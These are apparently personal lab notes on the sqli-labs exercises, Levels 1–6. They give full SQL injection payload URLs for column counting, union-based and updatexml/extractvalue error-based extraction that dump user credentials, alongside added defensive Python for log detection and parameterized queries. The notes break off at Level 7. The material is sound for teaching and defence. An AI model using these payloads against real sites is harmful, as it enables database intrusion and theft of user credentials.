SQL injection - hands-on notes - 2020-04-07
1. Single-quote test
http://localhost/sqli/Less-1/?id=1' If an error message appears, the site may have an injection flaw
2. AND test
http://localhost/sqli/Less-1/?id=1' and 1=1--+ This condition is always true, so of course the normal page is returned
http://localhost/sqli/Less-1/?id=1' and 1=2--+ If this errors, it suggests an injection flaw, but look at what the error actually is; not every error means there is an injection flaw.
3. OR test (the OR test works the other way round from the AND test: with AND, an injection point is indicated when the request returns an error; with OR, when the request returns normally)
http://localhost/sqli/Less-1/?id=1' or 1=1--+
http://localhost/sqli/Less-1/?id=1' or 1=2--+
Both requests return the normal page, which indicates an injection point.
4. XOR test (if the expression after xor is true, the error page is returned; if it is false, the normal page is returned; this indicates an injection point.)
http://localhost/sqli/Less-1/?id=1' xor 1=1--+ #returns the error page: injection point exists
http://localhost/sqli/Less-1/?id=1' xor 1=2--+ #returns the normal page: injection point exists
5. Plus/minus arithmetic test (the returned page is the same as the earlier page; if adding -1 returns the error page, that also indicates an injection flaw.)
http://localhost/sqli/Less-2/?id=10-0 #normal
http://localhost/sqli/Less-2/?id=10-1 #normal
http://localhost/sqli/Less-2/?id=10+1 #error
6. Input-box test
Special characters can be used to test it
#@!$/...
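The probes in steps 1 to 5 are easy to spot on the server side once the query string is URL-decoded. Added example, not part of the original notes: a small Python scanner that runs over constructed access-log request lines (built from the URLs above plus benign traffic) and tags each request parameter with the probe family it matches; the parameter name id and the rule names are assumptions for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log request lines: the probes from steps 1-5 plus benign traffic.
LOG_LINES = [
    "GET /sqli/Less-1/?id=1 HTTP/1.1",
    "GET /sqli/Less-1/?id=1' HTTP/1.1",
    "GET /sqli/Less-1/?id=1'%20and%201=2--+ HTTP/1.1",
    "GET /sqli/Less-1/?id=1'%20or%201=1--+ HTTP/1.1",
    "GET /sqli/Less-1/?id=1'%20xor%201=2--+ HTTP/1.1",
    "GET /sqli/Less-2/?id=10-1 HTTP/1.1",
    "GET /search/?q=rock%20and%20roll HTTP/1.1",
]

# One pattern per probe family in the notes, applied to the decoded parameter value.
RULES = [
    ("quote_probe", re.compile(r"^\d+['\"]\s*$")),                           # 1'  or 1"
    ("boolean_probe", re.compile(r"\b(and|or|xor)\s+\d+\s*=\s*\d+", re.I)),  # and 1=1, or 1=2, xor 1=2
    ("comment_tail", re.compile(r"--\s")),                                   # --+ decodes to "-- "
    ("arithmetic_probe", re.compile(r"^\d+\s*[-+]\s*\d+$|^\d+\s+\d+$")),     # 10-1, or 10+1 (+ decodes to a space)
]
NUMERIC_PARAMS = {"id"}  # parameters the application only ever expects as integers (assumed)

def classify_value(name, value):
    """Rule names that fire for one decoded parameter value."""
    hits = [rule for rule, rx in RULES if rx.search(value)]
    if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
        hits.append("non_integer_id")  # the simplest and most robust signal of all
    return hits

def scan(lines):
    """Returns {log line: {param: [rule names]}} for every line with at least one hit."""
    flagged = {}
    for line in lines:
        path = line.split(" ")[1]                     # "GET <path> HTTP/1.1"
        findings = {}
        # parse_qsl splits on the first '=' only and turns '+' into a space
        for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
            hits = classify_value(name, value)
            if hits:
                findings[name] = hits
        if findings:
            flagged[line] = findings
    return flagged

if __name__ == "__main__":
    for line, findings in scan(LOG_LINES).items():
        print(line, findings)
```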
Level 1 (closed with a single quote ')
http://localhost/sqli/Less-1/
http://localhost/sqli/Less-1/?id=1' Database error, so assume there is an injection point here
http://localhost/sqli/Less-1/?id=1' order by 3--+ Determine how many columns there are
http://localhost/sqli/Less-1/?id=-1' union select 1,2,3--+ Start of the union injection
http://localhost/sqli/Less-1/?id=-1' union select 1,database(),3--+ Gets the database name: security
http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ Gets the table name: users
http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ Gets the table's columns: username,password
http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(username,'|',password),3 from users--+ Usernames and passwords
Level 2 (no closing needed)
http://localhost/sqli/Less-2
http://127.0.0.1/sqli/Less-2/?id=1' #database error, there is an injection point here
http://127.0.0.1/sqli/Less-2/?id=1 order by 3--+ #column count is 3
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3--+ #union injection
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,database(),3--+ #the database is security
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #the table name is users
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #get the table's columns
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(password,'~',username),3 from users--+
Level 3 (closed with '))
http://localhost/sqli/Less-3/?id=1' #error message shown; try ') as the closing
http://localhost/sqli/Less-3/?id=1') and 1=1--+ #no error, so the closing works
http://localhost/sqli/Less-3/?id=-1') order by 3--+ #column count is 3
http://localhost/sqli/Less-3/?id=-1') union select 1,database(),3--+ #gets the database: security
http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #gets the table: users
http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #gets the table's columns username and password
http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(username,'~',password),3 from users--+
Level 4
http://localhost/sqli/Less-4
http://localhost/sqli/Less-4/?id=1%27 #single quote: no error message
http://localhost/sqli/Less-4?id=1" #error message shown, so the query uses double quotes
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
http://localhost/sqli/Less-4?id=1"--+ #try to build a correct closing
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
http://localhost/sqli/Less-4?id=1")--+ #returns normally, closing succeeded
http://localhost/sqli/Less-4?id=1") order by 3--+ #column count is 3
http://localhost/sqli/Less-4?id=-1") union select 1,database(),3--+ #gets the database: security
http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",table_name),3 from information_schema.tables where table_schema=database()--+ #gets the table: users
http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",column_name),3 from information_schema.columns where table_name='users'--+ #gets the columns of the users table: username,password
http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",username,"~",password),3 from users--+ #gets the usernames and passwords from the users table
Level 5 (closed with a single quote ' && updatexml error-based injection)
http://localhost/sqli/Less-5
http://localhost/sqli/Less-5/?id=1' #errors, so clearly the single quote is the key
http://localhost/sqli/Less-5/?id=1' order by 3--+ #column count determined to be 3
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1)),3--+ #gets the database: security
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)),3--+ #gets the table: users
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1)),3--+ #gets the column: password
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1)),3--+ #gets the column: username
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)),3--+ #username Dumb
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)),3--+ #password Dumb
Level 6 (closed with a double quote " && extractvalue error-based injection)
http://localhost/sqli/Less-6
http://localhost/sqli/Less-6/?id=6"--+ #this makes it clear the double quote is the closing
http://localhost/sqli/Less-6/?id=6" order by 3--+ #column count is 3
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select database()),0x7e))),3--+ #database security
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))),3--+ #table users
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e))),3--+ #the table's column password
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e))),3--+ #the table's column username
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select username from users limit 7,1),0x7e))),3--+ #gets the username admin
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select password from users limit 7,1),0x7e))),3--+
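The lookups in Levels 1 to 6 share one defect: the id parameter is pasted into the SQL text, so the closing character decides whether a payload parses, and the raw database error is echoed to the page, which is the oracle the order by, updatexml and extractvalue steps read. Added example, not from the notes or from the lab code itself: a Python/SQLite stand-in with constructed rows that runs the Level 1 to Level 3 query shapes both ways, string-built and with a bound parameter. The templates are assumptions inferred from the error messages above, and since database(), updatexml and extractvalue are MySQL-only, the payload is a plain union.

```python
import sqlite3
from urllib.parse import unquote_plus

# Query shapes for Less-1 to Less-3 as the notes infer them from the error
# messages: quoted, unquoted, and quoted inside parentheses (assumed templates).
TEMPLATES = {
    "Less-1": "SELECT id, username, password FROM users WHERE id='{v}' LIMIT 0,1",
    "Less-2": "SELECT id, username, password FROM users WHERE id={v} LIMIT 0,1",
    "Less-3": "SELECT id, username, password FROM users WHERE id=('{v}') LIMIT 0,1",
}
SAFE_SQL = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"

def make_db():
    """In-memory stand-in for the lab's security.users table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return db

def lookup_vulnerable(db, level, raw_id):
    """Interpolates the URL-decoded parameter into the SQL text, as the lab does.
    Returns ('rows', [...]) or ('error', message). The lab prints that message
    on the page, which is what the order by / updatexml steps read."""
    sql = TEMPLATES[level].format(v=unquote_plus(raw_id))  # the '+' in --+ decodes to a space
    try:
        return ("rows", db.execute(sql).fetchall())
    except sqlite3.OperationalError as e:
        return ("error", str(e))

def lookup_parameterized(db, raw_id):
    """Same lookup with a bound parameter: the value is data, never SQL text, so a
    quote or a union inside it matches no row instead of changing the query."""
    return ("rows", db.execute(SAFE_SQL, (unquote_plus(raw_id),)).fetchall())

if __name__ == "__main__":
    db = make_db()
    payload = "-1' union select 1,username,password from users--+"
    print(lookup_vulnerable(db, "Less-1", "1'"))     # ('error', ...): the quote breaks the query
    print(lookup_vulnerable(db, "Less-1", payload))  # ('rows', [...]): every username/password
    print(lookup_vulnerable(db, "Less-3", payload))  # ('error', ...): the closing here must be ')
    print(lookup_parameterized(db, payload))         # ('rows', [])
    print(lookup_parameterized(db, "1"))             # ('rows', [(1, 'Dumb', 'Dumb')])
```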
Level 7
http://localhost/sqli/Less-7